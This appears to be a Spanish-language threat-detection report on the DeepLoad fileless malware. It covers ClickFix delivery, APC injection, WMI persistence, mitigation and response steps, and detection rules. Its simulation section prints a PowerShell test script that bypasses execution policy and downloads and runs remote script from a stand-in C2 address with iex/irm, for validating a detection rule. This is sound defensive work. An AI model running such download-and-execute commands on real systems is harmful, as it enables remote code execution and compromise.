Seguir 
Detection stack
- AIDR
- Alert
- ETL
- Query
Resumen
DeepLoad es una familia de malware sin archivo distribuida a través de ingeniería social de ClickFix. Se basa en un cargador de PowerShell ofuscado, inyección de shellcode en memoria en procesos confiables de Windows, y ‘ruido’ generado por IA para reducir la fidelidad de la detección estática. El cargador establece persistencia utilizando una tarea programada y suscripciones a eventos WMI, puede propagarse a través de medios USB y roba credenciales a través de una extensión de navegador malintencionada y un componente companion filemanager.exe.
Investigación
El informe describe el acceso inicial comenzando con un comando de PowerShell ejecutado por la víctima, seguido de la recuperación del cargador a través de mshta.exe. El cargador utiliza Add-Type para generar un DLL temporal en tiempo de ejecución, luego inyecta shellcode en LockAppHost.exe utilizando inyección basada en APC. La persistencia se mantiene mediante una tarea programada y una suscripción a eventos WMI oculta capaz de restablecer la infección incluso después de la limpieza, con una ventana de retraso de aproximadamente tres días. El robo de credenciales se atribuye a filemanager.exe junto con una extensión de navegador maliciosa que opera en paralelo.
Mitigación
Habilitar Registro de Bloques de Script de PowerShell y alertar sobre cadenas de ejecución de PowerShell sospechosas. Auditar la actividad de red saliente de mshta.exe, monitorear la creación inesperada de tareas programadas y detectar el uso anómalo de QueueUserAPC indicativo de inyección APC. Durante la remediación, enumerar y eliminar explícitamente las suscripciones a eventos WMI en lugar de confiar únicamente en la limpieza de archivos/registro. Rotar las credenciales expuestas y eliminar cualquier extensión no autorizada del navegador para cortar las rutas de recolección de credenciales.
Respuesta
Si se detecta actividad de DeepLoad, aislar el host, detener la actividad de PowerShell maliciosa y terminar cualquier proceso inyectado. Eliminar la tarea programada y borrar la suscripción WMI asociada, luego erradicar filemanager.exe y la extensión de navegador maliciosa. Rotar todas las credenciales potencialmente comprometidas, sanitizar cualquier medio USB conectado, y validar el sistema para detectar artefactos de inyección residuales antes de devolverlo al servicio.
Palabras clave: DeepLoad, ClickFix, malware sin archivo, cargador de PowerShell, mshta.exe, Add-Type, shellcode en memoria, inyección APC, QueueUserAPC, LockAppHost.exe, persistencia de tarea programada, suscripción a eventos WMI, propagación USB, extensión de navegador maliciosa, robo de credenciales.
"graph TB %% Class definitions classDef action fill:#99ccff %% Node definitions step_user_exec["<b>Acción</b> – <b>T1204.004 Ejecución de Usuario: Copiar y Pegar Malicioso</b><br/>La víctima ejecuta comando PowerShell vía ClickFix."] class step_user_exec action step_powershell["<b>Acción</b> – <b>T1059.001 Intérprete de Comandos y Scripts: PowerShell</b><br/>Descarga el cargador usando Invokeu2011Expression (IEX)."] class step_powershell action step_mshta["<b>Acción</b> – <b>T1218.005 Ejecución por Proxy de Binario del Sistema: Mshta</b><br/>mshta.exe obtiene script remoto."] class step_mshta action step_schtask["<b>Acción</b> – <b>T1053 Tarea/Trabajo Programado</b><br/>Crea tarea de persistencia para reu2011ejecutar el cargador."] class step_schtask action step_injection["<b>Acción</b> – <b>T1055.004 Inyección de Proceso: Llamada de Procedimiento Asíncrona</b><br/>Inyecta shellcode en LockAppHost.exe."] class step_injection action step_reflective["<b>Acción</b> – <b>T1620 Carga de Código Reflexiva</b><br/>Compila memoria interna DLL vía Addu2011Type."] class step_reflective action step_masquerade["<b>Acción</b> – <b>T1036.003 Fingimiento: Renombrar Utilidades Legítimas</b><br/>Utiliza filemanager.exe y atajos .lnk."] class step_masquerade action step_removable["<b>Acción</b> – <b>T1091 Replicación a Través de Medios Extraíbles / T1080 Contaminar Contenido Compartido</b><br/>Lanza atajos maliciosos a unidades USB."] class step_removable action step_wmi["<b>Acción</b> – <b>T1546.003 Ejecución Activada por Evento: Suscripción a Eventos WMI</b><br/>Persiste y reu2011ejecuta después de la limpieza."] class step_wmi action step_keylog["<b>Acción</b> – <b>T1056.001 Captura de Entrada: Registro de Teclas</b><br/>Captura pulsaciones de teclas para credenciales."] class step_keylog action step_cred["<b>Acción</b> – <b>T1555.003 Credenciales de Navegadores Web / T1176 Extensiones de Software</b><br/>Extensión de navegador maliciosa roba contraseñas almacenadas."] class step_cred action step_valid["<b>Acción</b> – <b>T1078 Cuentas Válidas</b><br/>El atacante usa credenciales recolectadas."] class step_valid action step_c2["<b>Acción</b> – <b>T1102.002 Comunicación Bidireccional del Servicio Web / T1102.003 Unilateral</b><br/>Canal C2 y exfiltración."] class step_c2 action %% Connections step_user_exec –>|dispara| step_powershell step_powershell –>|descargas vía| step_mshta step_mshta –>|ejecuta| step_schtask step_schtask –>|crea| step_injection step_injection –>|inyecta en| step_reflective step_reflective –>|carga| step_masquerade step_masquerade –>|coloca atajos en| step_removable step_removable –>|habilita| step_wmi step_wmi –>|activa| step_keylog step_keylog –>|captura credenciales para| step_cred step_cred –>|provee| step_valid step_valid –>|facilita| step_c2 "
Flujo del Ataque
Detecciones
Comando y Control Sospechoso por Petición DNS de Dominio de Nivel Superior (TLD) Inusual (vía dns)
Ver
Llamada a Funciones de API de Windows Sospechosas desde PowerShell (vía powershell)
Ver
Descarga o Carga vía PowerShell (vía cmdline)
Ver
Posibles Comunicaciones C2 Sobre HTTP A IP Directa Con Puerto Poco Común (vía proxy)
Ver
Detección de Malware DeepLoad a través del Abuso de mshta.exe e Inyección APC [Creación de Procesos de Windows]
Ver
Detección de Malware DeepLoad Usando Bypass de PowerShell y Add-Type [PowerShell de Windows]
Ver
Ejecución de Simulación
Prerrequisito: El Chequeo de Previo de Telemetría y Línea Base debe haber pasado.
Justificación: Esta sección detalla la ejecución precisa de la técnica del adversario (TTP) diseñada para activar la regla de detección. Los comandos y la narrativa DEBEN reflejar directamente los TTPs identificados y apuntar a generar la telemetría exacta que espera la lógica de detección. Ejemplos abstractos o no relacionados llevarán a un diagnóstico erróneo.
-
Narrativa del Ataque y Comandos:
- Acceso inicial: El atacante tiene una sesión de PowerShell de bajo privilegio en el host de la víctima.
- Omitir política de ejecución: Inicia PowerShell con
-ep Bypasspara ignorar cualquier restricción de ejecución de scripts. - Compilar una carga útil .NET: Usando
Add-Type, integran una pequeña clase C# que, cuando se instancia, realiza una solicitud web al servidor C2 (http://10.0.0.5:3015/index). - Descargar y ejecutar script remoto: El atacante pasa el resultado de
irm(Invoke‑RestMethod) eniex, ejecutando el script malicioso en memoria. - Telemetría resultante: La línea de comando registrada por el sistema operativo contiene las tres cadenas requeridas (
-ep Bypass,Add-Type,iex(irm http://…:3015/index)), cumpliendo con la regla de Sigma.
-
Script de Prueba de Regresión:
# Ejecución maliciosa similar a DeepLoad # Este script reproduce el patrón exacto de comando requerido para disparar la regla de Sigma. $c2 = "http://10.0.0.5:3015/index" $payload = @" using System; using System.Net; public class Loader { public static void Run() { new WebClient().DownloadString(""$c2""); } } "@ # Iniciar PowerShell con el modo bypass, compilar la carga útil, luego ejecutar el script remoto powershell -NoProfile -ExecutionPolicy Bypass -Command ` "Add-Type -TypeDefinition `$payload; ` iex (irm $c2)" -
Comandos de Limpieza:
# Eliminar cualquier archivo temporal o ensamblaje cargado (si persiste) Remove-Item -Path "$env:TEMPloader.dll" -ErrorAction SilentlyContinue # Opcionalmente, limpiar la transcripción de PowerShell (si está habilitada) Clear-Host
Fin del Informe